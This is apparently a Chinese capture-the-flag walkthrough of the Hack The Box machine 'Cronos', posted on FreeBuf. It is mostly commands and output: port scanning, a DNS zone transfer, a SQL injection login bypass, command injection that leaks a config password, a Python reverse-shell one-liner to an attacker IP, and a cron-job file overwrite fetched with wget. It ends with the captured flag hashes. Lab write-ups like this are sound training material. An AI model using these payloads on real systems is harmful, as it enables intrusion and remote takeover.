官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.13 | TCP:22,53,80 |
$ nmap -p- 10.10.10.13 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
DNS 多重解析&子域名查询
$ nslookup 10.10.10.13
$ nslookup 10.10.10.13 10.10.10.13
$ dig axfr @10.10.10.13 cronos.htb
# echo '10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb'>>/etc/hosts
SQLI & RCE
username: admin' or '1'='1password: xxxx
8.8.8.8;ls
8.8.8.8;cat config.php
username:adminpassword:kEjdbRigfBHUREiNSDs
8.8.8.8;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.24",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
User.txt
7dd961c26e9e724da5ac41a381b8f585
权限提升
TRP00F 自动化权限提升
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900
Crontab 权限提升
$ cat /etc/crontab
$ wget -O /var/www/laravel/artisan http://10.10.16.24/reverse.php
Root.txt
c5a019884687c3347390940b6ee1eeea
已在FreeBuf发表 0 篇文章
- 0 文章数
- 0 关注者